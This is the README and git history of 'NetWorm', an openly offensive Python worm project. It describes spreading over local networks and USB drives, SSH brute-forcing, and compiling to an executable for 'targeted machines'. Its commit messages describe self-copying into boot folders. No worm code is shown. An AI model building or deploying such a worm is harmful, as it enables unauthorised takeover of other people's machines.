======================: FILES :======================
======================: README CONTENT :======================
# NetWorm
[![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/)

> Python network worm that spreads on the local network and gives the attacker control of these machines.

This code is not finished and works more like a "worm template" for you to get inspiration at the moment. 

You can bruteforce ssh servers, spread with USBs, etc..

## Screenshots
![bruteforcing local machines](https://github.com/pylyf/NetWorm/blob/master/screenshots/pic1.PNG)

_Bruteforcing local machines with port 22 open._

## Downloading necessary libraries

```
pip install -r requirements.txt
```

## Executing

Windows & Linux:

```
python worm.py
```

## Compilation (.exe)

Targeted machines won´t probably have python and the required libraries installed. 
To run this code on other machines, you need to convert it into an executable.

I recommend the [Pyinstaller library](https://www.pyinstaller.org/).

To use it, simply write these commands in your terminal:
```
pip install pyinstaller

pyinstaller worm.py
```



## Meta

[https://github.com/pylyf/NetWorm](https://github.com/pylyf/NetWorm)

Distributed under the MIT license. 

## Contributing

1. Fork it (<https://github.com/pylyf/NetWorm/fork>)
2. Create your feature branch (`git checkout -b feature/fooBar`)
3. Commit your changes (`git commit -am 'Add some fooBar'`)
4. Push to the branch (`git push origin feature/fooBar`)
5. Create a new Pull Request

## Legal Advice
This repository and every script included in it is for educational and testing purposes only.
The owner nor any contributor is not responsible for your actions.

====================== GIT HISTORY: ======================
9439d61 HEAD@{0}: clone: from https://github.com/pylyf/NetWorm
commit 9439d6156c2ea061fb64d7fb90e7d8a693ee637b
Merge: 4cfe317 d583e19
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Thu Sep 2 21:36:15 2021 +0200

    Merge pull request #9 from TerrehDactyl/patch-1
    
    Merge - Update worm.py

commit d583e1963e891645e0ea05235b8a5bf2a59f2e33
Author: Terry Bolton-Williams <55043494+TerrehDactyl@users.noreply.github.com>
Date:   Tue Aug 31 22:50:06 2021 -0600

    Update worm.py

commit e5f98a5fca00de5c55df3ecccb74dacd525293cd
Author: Terry Bolton-Williams <55043494+TerrehDactyl@users.noreply.github.com>
Date:   Tue Aug 31 22:45:32 2021 -0600

    Update worm.py
    
    Scans any user defined port using a single function

commit 4cfe3178e96a2495ea7abf292d2b3bf915b3416f
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri May 21 15:32:09 2021 +0200

    Update requirements.txt

commit 1249c69ae0311a96ddcc0c37c71645d9da64a699
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Thu May 6 10:58:00 2021 +0200

    Fixed typo

commit d6e778990e137a41086bb651add32b643b180ad5
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Thu May 6 10:56:03 2021 +0200

    Fixed typo

commit c092090f39729185c13fd00b348bd6376b2a3945
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Thu May 6 10:54:50 2021 +0200

    Drivespreading
    
    Drivespreading is now a threaded function. Network functions have been moved to networking.py
    
    README.md updates and also creation of a requirements.txt file.

commit 501828fc5d6442b4859dfc34f1df74ccae470726
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Sat Dec 7 17:38:31 2019 +0100

    Delete _config.yml

commit c2499d10bcdadb761986f8f8c007ba8bd47ac799
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Thu Jun 13 17:45:41 2019 +0200

    Updating SSH scan function.

commit d30efee9b44d9da5e4c5900b47d87798c14a8953
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Mon Jun 10 19:11:11 2019 +0200

    Set theme jekyll-theme-minimal

commit 1894c6796f323824b8819bebdeb878b2cc37128e
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Aug 24 11:27:39 2018 +0200

    Update README.md

commit 71d5adca6ceeeed82a4b18d36370896ea02038ec
Author: pylyf <pylyf.kom@gmail.com>
Date:   Fri Aug 24 11:24:39 2018 +0200

    File Transfer - Spreading

commit c55d46d331650fc6d75048b044ac5809faa8b05f
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Jul 27 11:38:33 2018 +0200

    Update README.md

commit 745da7b60877ff2c5f0bc48eed51ab0b3d98a52b
Author: pylyf <pylyf.kom@gmail.com>
Date:   Fri Jul 27 11:32:51 2018 +0200

    pic1 moved to folder

commit 10a7d65b52c0819a28bd7d544613ea7bf62a8782
Author: pylyf <pylyf.kom@gmail.com>
Date:   Fri Jul 27 11:31:47 2018 +0200

    Small Changes, Example pic added.

commit fae93a27be01e08be10f63a289f7b96c1ff694d4
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Mon Jul 23 13:15:13 2018 +0200

    Update README.md

commit 58f16f1076c187df9f2dade71f420b9a3513164e
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Mon Jul 23 13:05:20 2018 +0200

    Update README.md

commit 3bd2b6491b84bfebcbc1627b1844c0978c9372c5
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Mon Jul 23 13:04:25 2018 +0200

    Update README.md

commit 7e03073e8d68e03b3f89e1333bddd1341774b872
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Sat Jul 21 16:34:57 2018 +0200

    Update README.md

commit f90637c2edbbb40d37bfbfe10cfc55ddd7decb5a
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Thu Jul 19 16:08:53 2018 +0200

    Fixed a bug. Worm Copies itself properly now.

commit 8a70e376d44519412e1d4516c7b0c8a5b607da24
Merge: 02426cb 10cc849
Author: pylyf <pylyf.kom@gmail.com>
Date:   Thu Jul 19 15:31:52 2018 +0200

    Merge branch 'master' of https://github.com/pylyf/NetWorm

commit 02426cb4a98c3646fda6fc904e766bed7734586c
Author: pylyf <pylyf.kom@gmail.com>
Date:   Thu Jul 19 15:31:42 2018 +0200

    :rice_ball:  Importing required libraries

commit 10cc8497fc16abffba7de3aeef89661967b733e9
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Sat Jul 14 23:53:00 2018 +0200

    Update README.md

commit 7038f7554205e47472762456834aa65dbaee514e
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Jul 13 23:35:11 2018 +0200

    I forgot to commit today
    
    I almost broke my commit-everyday-streak so this is quite a weak one

commit 9717276b6120f062bbfa087ff071bd9dca5bfacf
Merge: 66ac325 776121f
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Wed Jul 11 21:44:45 2018 +0200

    Merge pull request #1 from LostMoped/master
    
    added Drive spreading - Merged.

commit 776121f6fa63cfd9168bd69c1ef629c6e0d5c1c9
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Wed Jul 11 21:42:28 2018 +0200

    Update worm.py
    
    Reducing if statements using a loop

commit b89cff4be3cdfb4f5d37a3f3e36db5f17692f42c
Author: LostMoped <34167751+LostMoped@users.noreply.github.com>
Date:   Wed Jul 11 21:08:18 2018 +0200

    added Drive spreading
    
    Scans for drives every 3 seconds. If a drive is present, copies itself over to it (if the drive is C:\,tries the bootfolder). Not yet copies and hides itself.

commit 66ac3259654ad871405c3e5152d8fb9c8c6d3fc7
Author: pylyf <pylyf.kom@gmail.com>
Date:   Mon Jul 9 17:45:42 2018 +0200

    small fixes

commit 3c5fcc7031f0194a7f23e97f14b5049db57f5eb8
Author: pylyf <pylyf.kom@gmail.com>
Date:   Mon Jul 9 17:44:01 2018 +0200

    Colored Logging

commit 55399f0af543bd2da92339b861a69877d1688661
Author: pylyf <pylyf.kom@gmail.com>
Date:   Sun Jul 8 14:33:10 2018 +0200

    OwO Adding basic FTP connection
    
    Needs to be finished.

commit d0967f43d23fe0708e741afe468ced1db12b6f3f
Author: pylyf <pylyf.kom@gmail.com>
Date:   Sat Jul 7 15:21:01 2018 +0200

    Bruteforcing SSH works
    
    Bruteforcing SSH works

commit 516792ff7b87762038a63028e7e0fb967e6940c1
Author: Pylyf <pylyf.kom@gmail.com>
Date:   Sat Jul 7 13:45:14 2018 +0200

    Adding more functions
    
    THE COMMIT SHALL BEGIN

commit 1ae155fd37d5853a2c62c9f2dca15a30ca19e056
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Jul 6 22:54:23 2018 +0200

    Update worm.py
    
    Removing unnecessary line.
    
    *You apparently can't delete whitespaces on phones*

commit 77e843f8601844655ee282f3b72d502eb1c4187c
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Jul 6 22:01:00 2018 +0200

    Create worm.py

commit 4690eb09ed4647f9a91c07414ca45aa7b9d9c749
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Jul 6 22:00:23 2018 +0200

    Temporary README

commit 2d05f1aa8757b4f9c7fd0683a87d1cf7ac39f79a
Author: Filip Komárek <pylyf.kom@gmail.com>
Date:   Fri Jul 6 21:57:03 2018 +0200

    Initial commit
